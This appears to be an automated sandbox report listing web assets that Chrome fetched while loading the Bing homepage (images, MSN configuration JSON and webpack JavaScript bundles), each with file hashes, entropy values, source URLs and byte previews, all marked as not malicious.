                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+......IDATx..S...q.~......OPdP.... .e...`P2.+)..&...D!.`1JR...t~vw>...ru.......>..........,...p2..."..b...xn.._.H$....K|...f.H$..jQ....0.N.v...p8@.R..r!..C.... ..c>...Z-..~.....l.X0..i.z.F&...L&......j.b.X$./.F...N....&...&..+@.^..xD$.A.P@...r..c.$...Z.p:.H'.Px.(..$L ..f.A*.B...j..L&.\,.....B.P|.p..~.6...j...R....L...T*..n...._..5........&...8.^...lF..v.p8LN....T*...N'..(.9.."...3.f...1..?.W[.._...4B...J%|>...?.Yd.....h..7co//.......w..g......?.,.;......L.....IEND.B`................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):80377
                                                                                                                                                                                                                                                                        Entropy (8bit):5.044147290339786
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:KlT4i0HdZuaRNuccj3q4Zz9THmcWcTZqhzbKyNw:YMdZuaRNuzutcWcdB
                                                                                                                                                                                                                                                                        MD5:B9A834AEDC811DA9EE6344632C850EC6
                                                                                                                                                                                                                                                                        SHA1:CEBAD948A2CCED6DAC3C676C3F8CE1CD59B649DF
                                                                                                                                                                                                                                                                        SHA-256:86A7A9E4632332D8419D54ABA9D2179E5484A724269DC6A0B3B5B5E63031E706
                                                                                                                                                                                                                                                                        SHA-512:A2217F8A68430FB4ED164AF50E1F41A675A2B4308BAA4E6CB4773AF8E60814C35CF4C6C4D0798C608988B3C0751B7AE83E1759AE3BCCBE5FE21BC87E672A3D24
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:"https://www.msn.com/resolver/api/resolve/v3/config/?expType=AppConfig&expInstance=default&apptype=bingHomepage&v=20231204.1&targetScope={%22audienceMode%22:%22adult%22,%22browser%22:{%22browserType%22:%22chrome%22,%22version%22:%22117%22,%22ismobile%22:%22false%22},%22deviceFormFactor%22:%22desktop%22,%22domain%22:%22https://www.bing.com%22,%22locale%22:{%22content%22:{%22language%22:%22en%22,%22market%22:%22us%22},%22display%22:{%22language%22:%22en%22,%22market%22:%22us%22}},%22os%22:%22windows%22,%22platform%22:%22web%22,%22pageType%22:%22widgetfeed%22,%22pageExperiments%22:[]}"
                                                                                                                                                                                                                                                                        Preview:{"configs":{"AppConfig/default":{"properties":{"rootExperience":{"configRef":{"experienceType":"Widgets","instanceSrc":"default"}}}},"Widgets/default":{"properties":{"dataConnectors":[{"screenWidth":"Any","children":[{"instanceId":"WeatherData","configRef":{"experienceType":"WeatherData","instanceSrc":"default"}},{"instanceId":"TopicData","configRef":{"experienceType":"TopicData","instanceSrc":"default"}}]}],"widgets":{"BingHomepageFeed":{"instanceId":"BingHomepageFeed","configRef":{"experienceType":"BingHomepageFeed","instanceSrc":"default"}},"EsportsCard":{"instanceId":"EsportsCard","configRef":{"experienceType":"EsportsCard","instanceSrc":"default"}},"SportsCardWC":{"instanceId":"SportsCardWC","configRef":{"experienceType":"SportsCardWC","instanceSrc":"default"}},"TrafficCardWC":{"instanceId":"TrafficCardWC","configRef":{"experienceType":"TrafficCardWC","instanceSrc":"default"}},"WeatherCardWC":{"instanceId":"WeatherCardWC","configRef":{"experienceType":"WeatherCardWC","instanceSrc"
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4402
                                                                                                                                                                                                                                                                        Entropy (8bit):7.886154808744179
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8/bxnuERAxkILDk91RZ3ttXoMTF685436Nl1alqYesUf8q8YK0MaI1+qFoSEBfrm:8zgEYg917vTFBalqYeB8zB1GSEhmIU
                                                                                                                                                                                                                                                                        MD5:B9F2ED6B7A89EC13B725AD6C6F1824C0
                                                                                                                                                                                                                                                                        SHA1:151E9E232DF6551D68D1299C7D8221D3EFD02A4F
                                                                                                                                                                                                                                                                        SHA-256:A3F6BD882A0A8F4F62E7F2D87C65AC084D154BAF6146D851A8B73C2F26A8C780
                                                                                                                                                                                                                                                                        SHA-512:82D1F20EBB416CB9BD9DDE3670EB959C547A8996B8FA0067BCCCC3BBA341FB5539EB85E84F166553DE58BDD72B6F20AA8987E6AEAE6056A146C603DE0BE579D6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....c.<.../.l...M.'.Q}..{&_..e.~.....i.E..6.G$.t....;..ZG.,....n..,..J.......?.yw=\D.x........./G.....{.G.s.;.G.....-x.:*. #..u#..^#{...e.M..v..G...Um....0vzW.x...P..K........n...x.>.x.U.....0."x.{..5(..r>l...@.Os.f.].^...T..m..t..*.l...5......u.K...<d.q?.o.....@v...3......7g.{V....]../..DY...d..... .kA.x.$..~u,.u.`...z.[....._..l#.......?..D......o>.?Z.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3621
                                                                                                                                                                                                                                                                        Entropy (8bit):7.869742556964816
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8/bxnuERAczjHWu1zObitB0zRp5/tEHySKmpdvgWvPXba22J5ieGnCN9WpM:8zgE7vHWut5BWLeSspNjLa22J5i1CvW+
                                                                                                                                                                                                                                                                        MD5:AFA5114B4E0AB7C2770F87A24EB36CC0
                                                                                                                                                                                                                                                                        SHA1:F0443CD986DFA5AD165E91700639AC1B31F17CD9
                                                                                                                                                                                                                                                                        SHA-256:9434F5BD85A582483EF73E8B9FE18831894C311DB4C3A2BC3F3E9FE6CAC5A1BB
                                                                                                                                                                                                                                                                        SHA-512:DBD05FEE4CD440301B978E9B517CF8825AEBC34827BB120C0CC83EFD65393B7202C57FBD39091BF21A608FF91AEA3E114E2DEE63201DA5FEE650A0D36BF87103
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.."..=F.P...x.J.$...I.T....:Y........y.....l..?.'...?..?.....z..!6ooy...i..u.lw...r.d..d.z.^..E.i.].F.8'..a.z....Z.{....x.e..........J.9Kc..Ic....JL..V1..v$....W.......3e.....0........@..xoc..iO.r7t..|{{.....owq-.C.p.A.j.r...........G.Y....u..#..RxP.\c.9.....2x.....b.I%..y.l.wee\.T.......U]z[{.baEP&...=..)'u.*.:...n{}....}..cl....1....j.q.G..A....'.....L.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2270072
                                                                                                                                                                                                                                                                        Entropy (8bit):5.514925874975835
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:/HvYZPvbTcU1TZGd4lsnIsBN7+pMMDcfGn08yu2wbrBkuR7abqujNVu2wbuUodM4:6EUuYW
                                                                                                                                                                                                                                                                        MD5:99F265BA30F6490194CEF31B5354A191
                                                                                                                                                                                                                                                                        SHA1:D7B28EA9A37BEC1BD61047F0023CB2D78E1F6D5B
                                                                                                                                                                                                                                                                        SHA-256:93919290215A713DE539F3566C39A8D3F8681046A5FC6251A9E3C323726BA4F0
                                                                                                                                                                                                                                                                        SHA-512:E21D0608A1BB1D08F44F9D45F745A6CDECE16A760DBD860425BCCA063C5001A4FA91E8CC51E333C2456FA9B554FCD0E1D8B2EEA626345E84FA5620F645C27E4D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/common.cc82bdf90bc0731a6db7.js
                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["common"],{68402:function(e,t){t.Z='<svg width="12" height="12" viewBox="0 0 11 12"><path d="M6.5 1.75a.75.75 0 0 0-1.5 0V5H1.75a.75.75 0 0 0 0 1.5H5v3.25a.75.75 0 0 0 1.5 0V6.5h3.25a.75.75 0 0 0 0-1.5H6.5V1.75Z"/></svg>'},53271:function(e,t){t.Z='<svg width="20" height="20" viewBox="0 0 20 20"><path d="M6 10a1.25 1.25 0 1 1-2.5 0A1.25 1.25 0 0 1 6 10zM11.25 10a1.25 1.25 0 1 1-2.5 0 1.25 1.25 0 0 1 2.5 0zM15.25 11.25a1.25 1.25 0 1 0 0-2.5 1.25 1.25 0 0 0 0 2.5z"/></svg>'},8686:function(e,t){t.Z='<svg width="12" height="12" viewBox="0 0 12 12"><path d="M9.76 3.2c.3.29.32.76.04 1.06l-4.25 4.5a.75.75 0 0 1-1.08.02L2.22 6.53a.75.75 0 0 1 1.06-1.06l1.7 1.7L8.7 3.24a.75.75 0 0 1 1.06-.04Z"/></svg>'},60577:function(e,t){t.Z='<svg width="20" height="20" viewBox="0 0 20 20"><path d="M12.35 15.85a.5.5 0 0 1-.7 0L6.16 10.4a.55.55 0 0 1 0-.78l5.49-5.46a.5.5 0 0 1 .7.7L7.2 10l5.16 5.15c
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):885
                                                                                                                                                                                                                                                                        Entropy (8bit):4.540904779535972
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:ty6MIrYQ2f6pmdyG5zbaWqFQZtKSlt85upWEtKMca/Kv3kK3kK3TfQARQ:ttMIYQpmgG5z+zFQZcSXWEcoqRQ
                                                                                                                                                                                                                                                                        MD5:414172125A836F204112B66E4ADFE745
                                                                                                                                                                                                                                                                        SHA1:EED4DF6339EBE66FE56EC09A4D9E6527935F30DC
                                                                                                                                                                                                                                                                        SHA-256:5E60F75EFFE3C581E844D490F8E002510C7DC67A45BCBB36C433F08BF5416E04
                                                                                                                                                                                                                                                                        SHA-512:2701D263E3F4FFAF919A610332FF76ED23D104632A16CBFABAA119DB27756D2335311973413EAABA618BE18DAA65ED88EA648A64D0D84DAB51FD98A929E7F244
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/7tTfYznr5m_lbsCaTZ5lJ5NfMNw.svg
                                                                                                                                                                                                                                                                        Preview:<svg enable-background="new 0 0 64 48" viewBox="0 0 64 48" xmlns="http://www.w3.org/2000/svg"><path d="m4.5.5h55c2.209 0 4 1.791 4 4v39c0 2.209-1.791 4-4 4h-55c-2.209 0-4-1.791-4-4v-39c0-2.209 1.791-4 4-4z" fill="#111" stroke="#111"/><path d="m14 14h-6c-1.105 0-2-.895-2-2v-4c0-1.105.895-2 2-2h6c1.105 0 2 .895 2 2v4c0 1.105-.895 2-2 2z" fill="#106ebe"/><path d="m34 36h-26c-1.105 0-2-.895-2-2v-14c0-1.105.895-2 2-2h26c1.105 0 2 .895 2 2v14c0 1.105-.895 2-2 2z" fill="#c4c4c4"/><path d="m24 14h29c2.209 0 4-1.791 4-4s-1.791-4-4-4h-29c-2.209 0-4 1.791-4 4s1.791 4 4 4zm31 4h-14c-1.105 0-2 .895-2 2s.895 2 2 2h14c1.105 0 2-.895 2-2s-.895-2-2-2zm0 7h-14c-1.105 0-2 .895-2 2s.895 2 2 2h14c1.105 0 2-.895 2-2s-.895-2-2-2zm0 7h-14c-1.105 0-2 .895-2 2s.895 2 2 2h14c1.105 0 2-.895 2-2s-.895-2-2-2zm0 7h-47c-1.105 0-2 .895-2 2s.895 2 2 2h47c1.105 0 2-.895 2-2s-.895-2-2-2z" fill="#ddd"/></svg>
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):14946
                                                                                                                                                                                                                                                                        Entropy (8bit):5.482657233326323
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:VIKOdXz7gwv3dF2qqaAj4RP5Bt8VXS2HQ6VwJoYtuPGR7LBThy:xO9Vj6Y5kVXS7XvU+Dk
                                                                                                                                                                                                                                                                        MD5:96323B77381DC3793D3E1F4EB21644D2
                                                                                                                                                                                                                                                                        SHA1:023E87E237C0E2F31AD79DCCA8B0EFD3FD1239EB
                                                                                                                                                                                                                                                                        SHA-256:61D8513C6DCBAC9B7C32C2BD8A85A453E503148FF17608328B184085F9730EB7
                                                                                                                                                                                                                                                                        SHA-512:BFDBD6C53966526C7FB15D1EA6CC0EBE39665A3DB8BF7B2E0BBB0ED83491B5B1E48476C689360B3BCEE54C514CB8C56053D974D72EBB931F4139E307DD20AAC2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/hp/api/v1/carousel?&format=json&ecount=20&efirst=0&&
                                                                                                                                                                                                                                                                        Preview:{"title":"","data":[{"typeName":"TrendingNow","items":[{"title":"6 dead, 3 injured in Texas","url":"/search?q=Shootings+across+Texas&efirst=0&ecount=50&filters=tnTID%3a%223C7AB6C8-CAEF-439f-B7E1-A920F1936B4E%22+tnVersion%3a%225397447%22+Segment%3a%22popularnow.carousel%22+tnCol%3a%220%22+tnOrder%3a%220a7a28d2-14aa-474f-bf54-8e2d26d100a9%22&form=HPNN01","imageUrl":"/th?id=OPN.RTNews_pu4Sh615T_Ss0HuDxz5lbg&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow","badge":null,"imageCredit":". Provided by New York Post","tooltip":"Shootings across Texas","linksTarget":"","dataTags":null,"additionalMetaData":{"editorial":{"clickThroughUrl":"","badgeText":"","badgeColor":"","badgeBackground":""},"msn":{"clickThroughUrl":"","articleId":"","source":""}},"shortTitle":"","longTitle":""},{"title":"Air Force confirms fatality","url":"/search?q=Osprey+crash+in+Japan&efirst=0&ecount=50&filters=tnTID%3a%2262A0725A-144A-40a3-B55B-EAC2E4C299F7%22+tnVersion%3a%225397447%22+Segment%3a%22popularnow.carousel%22+tnCol%3a%22
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):6390
                                                                                                                                                                                                                                                                        Entropy (8bit):7.916045846394136
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgENeFGicJL25Ssxv3SEgGTEU4AKiTi2d95qNgmsXhn2:ygVCZ4bvNgVXoTivNgmsXp2
                                                                                                                                                                                                                                                                        MD5:8BD85792846F5BAE63FDC99CA49150FF
                                                                                                                                                                                                                                                                        SHA1:205880EDF6118311758CBDEC786E34BF6C5F2C04
                                                                                                                                                                                                                                                                        SHA-256:6C29760D9B90767B751689DA2ACFBDF12C15C63427CBCB62D7947F78B9C4F85F
                                                                                                                                                                                                                                                                        SHA-512:55E6443EA079230DBF72A81F7B043D9D9EFA5B11B4A502A77CD4243D9BF676845951CBC1F88703E9D3A775F12EFB43DA725CAE349EA844F0AB10B320515B20A7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/th?id=OPN.RTNews_XJzc5sCg4mbh16YyF22jRA&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....8b..'.._'...2.O0H.U.....t.>...".&..e...WL....1.....R%...z.K.......e..6....:.:...V_i...d...v..p..NGo.N.wCP....l..\.:s...^.gt.w....yN....G....i.C),"..s.p..z.......hV.Q.3y"(..z......(.+TZ..z.Y......[.?..JO..D.#J.l...*g.....n.....QN...|C. ..H...Y... *.x.^|...zm.......".$X.....l..}I5..K..k.9......,.....b..Q".....g..-..{..._9...oi.q...Y.D.p...[.J.6...
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):885
                                                                                                                                                                                                                                                                        Entropy (8bit):4.540904779535972
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:ty6MIrYQ2f6pmdyG5zbaWqFQZtKSlt85upWEtKMca/Kv3kK3kK3TfQARQ:ttMIYQpmgG5z+zFQZcSXWEcoqRQ
                                                                                                                                                                                                                                                                        MD5:414172125A836F204112B66E4ADFE745
                                                                                                                                                                                                                                                                        SHA1:EED4DF6339EBE66FE56EC09A4D9E6527935F30DC
                                                                                                                                                                                                                                                                        SHA-256:5E60F75EFFE3C581E844D490F8E002510C7DC67A45BCBB36C433F08BF5416E04
                                                                                                                                                                                                                                                                        SHA-512:2701D263E3F4FFAF919A610332FF76ED23D104632A16CBFABAA119DB27756D2335311973413EAABA618BE18DAA65ED88EA648A64D0D84DAB51FD98A929E7F244
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg enable-background="new 0 0 64 48" viewBox="0 0 64 48" xmlns="http://www.w3.org/2000/svg"><path d="m4.5.5h55c2.209 0 4 1.791 4 4v39c0 2.209-1.791 4-4 4h-55c-2.209 0-4-1.791-4-4v-39c0-2.209 1.791-4 4-4z" fill="#111" stroke="#111"/><path d="m14 14h-6c-1.105 0-2-.895-2-2v-4c0-1.105.895-2 2-2h6c1.105 0 2 .895 2 2v4c0 1.105-.895 2-2 2z" fill="#106ebe"/><path d="m34 36h-26c-1.105 0-2-.895-2-2v-14c0-1.105.895-2 2-2h26c1.105 0 2 .895 2 2v14c0 1.105-.895 2-2 2z" fill="#c4c4c4"/><path d="m24 14h29c2.209 0 4-1.791 4-4s-1.791-4-4-4h-29c-2.209 0-4 1.791-4 4s1.791 4 4 4zm31 4h-14c-1.105 0-2 .895-2 2s.895 2 2 2h14c1.105 0 2-.895 2-2s-.895-2-2-2zm0 7h-14c-1.105 0-2 .895-2 2s.895 2 2 2h14c1.105 0 2-.895 2-2s-.895-2-2-2zm0 7h-14c-1.105 0-2 .895-2 2s.895 2 2 2h14c1.105 0 2-.895 2-2s-.895-2-2-2zm0 7h-47c-1.105 0-2 .895-2 2s.895 2 2 2h47c1.105 0 2-.895 2-2s-.895-2-2-2z" fill="#ddd"/></svg>
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (24016)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):176641
                                                                                                                                                                                                                                                                        Entropy (8bit):5.417759687232788
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:PQH7d0WjpvRZR3OnbJooDaHNZya0gkR7Ibp:LWjpPKJoOaHua0gkZG
                                                                                                                                                                                                                                                                        MD5:B2BDD0B747AA9B607FA0245B831A39E2
                                                                                                                                                                                                                                                                        SHA1:74C213119E6BB6D700DDD9BCCCC91027AAB2D305
                                                                                                                                                                                                                                                                        SHA-256:33CB50D25ADFF662239A59FC51D01D78C89E2F369FB80E7E3334D0E4349C1278
                                                                                                                                                                                                                                                                        SHA-512:033FD94D608FB997CFE158AF0B7DE54989FBE463304C85EEDE21896499BEBF29F32A2EAD885EC6056F7749CC2421EF6C9F0C03C3532469CD9A0481931F2D600E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/web-components_super-cards_dist_cards_super-sd-card_core-sd-card_register_js.44636ab434433b578ba1.js
                                                                                                                                                                                                                                                                        Preview:(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["web-components_super-cards_dist_cards_super-sd-card_core-sd-card_register_js"],{64664:function(t,e,i){"use strict";i.d(e,{F:function(){return n}});class n{constructor(){this.supports3DContent=!1}attemptNavItemChange(t){return!!this.superNavChangeCallback&&(this.superNavChangeCallback(t),!0)}disconnectSuperNav(){this.superNavChangeCallback=void 0}getForceSelectedNavItemId(){return this.forceSelectedNavItemId}getSupports3DContent(){return this.supports3DContent}static getInstance(t){return n.instance||(n.instance=new n),t&&(n.instance.superNavChangeCallback=t),n.instance}registerForceSelectedNavItemId(t){this.forceSelectedNavItemId=t}registerSupports3DContent(t){this.supports3DContent=t}}},40866:function(t,e,i){"use strict";let n;i.d(e,{k:function(){return o}});const o=t=>{n&&t&&n.observe(t)}},11232:function(t,e,i){"use strict";i.d(e,{$0:function(){return O}});var n=i(45896),o=i(43178),a
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):308
                                                                                                                                                                                                                                                                        Entropy (8bit):6.593727490677001
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:6v/lhPk+nD1v427BaK+V1dv340ikehD09kEKBtUsu87sCLQKpRVp:6v/7sG1vU1l3PehASTYstSKpR7
                                                                                                                                                                                                                                                                        MD5:BDA49766E2E7E028EF09D0E34988ECDF
                                                                                                                                                                                                                                                                        SHA1:73FED2C00C224AA0DF89397EC41488D63975C882
                                                                                                                                                                                                                                                                        SHA-256:5CBDA906C7DB6D50C7E200D73841A7BB7404BCFF1B3C9121AA5BC79DBC608B9A
                                                                                                                                                                                                                                                                        SHA-512:2292945B9F53D495B9845CDE7FDDDC6890EDBF00262314691BDC609D81DD6521AD3BB687766A2291077A1848EF49BD04A430C96503EB3254DAD6E932963C9ABD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/sa/simg/favicon-trans-bg-blue-mg-png.png
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR... ... .....D......9PLTEGpL.n..n..p..n..n..m..p..p..n..o..o..n..o..n..o..n..n..n...T....tRNS... ..@.................IDAT8.....0.D.gZ.....5..x.t.YM...r(.....)...O-._.R..r#...[O.o..e.\......(...h..}...h.=.?_Q...#..Iu!o6.u.-....W.0......aT..Ai...........A?.~..t.q....V......IEND.B`.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 380 x 32, 16-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2652
                                                                                                                                                                                                                                                                        Entropy (8bit):7.884709708562161
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:javK4OjNcIpDuhI/hQcktCY6np7Rad4iB+sWNEFMm0483DYqTNcw+Cg8oUvQ9hpB:uvMFpDSI/hS6npE4iks0x4KPGwnZQ9h3
                                                                                                                                                                                                                                                                        MD5:5AB91626593CEE8F79A724655354F70A
                                                                                                                                                                                                                                                                        SHA1:F6BA164760F978FB493330FDB5B6844AF3B6257C
                                                                                                                                                                                                                                                                        SHA-256:BB0CEB73EF7F49DBC91DC80467CECA366DCEC34D8B8B45F4983281CC98F9AE11
                                                                                                                                                                                                                                                                        SHA-512:1DA37EBA980A70B695071061E9003D36AAE6D8D64FEEDEA481949B11EF63D4E52D0D29A62B3CABB33859BBF3E74A2769DA6F01D0DEE458F016BF8668BCD726C5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR...|... ......E.:...#IDATx..n.>../....~-......G(ba.. u.C.+.j..JH..A.N........F.u........YQ...9...qns%..#M.....|y0@..^[...X..sS......c..3....7....GG....[].....4.^7...g}..}...~......w.....d.....9/.x...c[...I.....i.~7.$....f.....%..9.v.......Nx.........`.M....o.....4..............^...7.7.l?~?......w..xnn0.u..;...33Z.|..oY......=..W...iv\.`Js.ek.4...........h..gZ.+".)&d.K`...d...A.H.....p..=.}.X..'.m.w.~.>.M30........O./.yV..?..5I.....Q..?\E..3.>H....hq.X........x0..Fj..H.Cy......d b.(..2m.......l...%9..Uu..}.d_..y..Z....m..C....j..k..y....<........paa8L...y3....{".%....o....._O.p.hd.oilWu..T......a....:..-6..@....S.p.^.3....R''.....q.KH.<.../..?.:m.WV..].k........lN...9...1..">.s...{..B....n{P.....^\ll...a@n&.. l....[.._....S..X...{.+...`..~.+.........T....~.....q..>.Z.=)+.a........f&.+uu......j.h....~..a..[...c...j8..._...^.n5.M..u.J.|Z}.`....g.h....J....w....{.~R..T...]N.A...M.N.n..id.>.W...xY.rl/...\..\W9^=...~..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (20049), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):20049
                                                                                                                                                                                                                                                                        Entropy (8bit):5.197395310029793
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:hAmL9pK5FEuLExhGZeDkN6707b+ah7XAIUIhyYv6dtl8xol9IK/tfaUho:hAmLfK5WuLEbGZeR707b+aTR4wwl8xoK
                                                                                                                                                                                                                                                                        MD5:10CE2F0202334756D5B63C739BD0D21C
                                                                                                                                                                                                                                                                        SHA1:E1E78C6AE4D0CF2260038E68488226422C56AD32
                                                                                                                                                                                                                                                                        SHA-256:7F09A5243D84E6CE04872760D9ABB280AD2BFF9967E933B1F013224A0CA56118
                                                                                                                                                                                                                                                                        SHA-512:F04215741C20BF3B6818665FAEA578B385AC623BFDFBD7340842E537D6B176C615FEF187791A551F4B75CD0CE208F9533639ECAA8444EADF9843B096A0AC5DA8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/social-bar-coachmark-manager.54febbb979ccbe9afe99.js
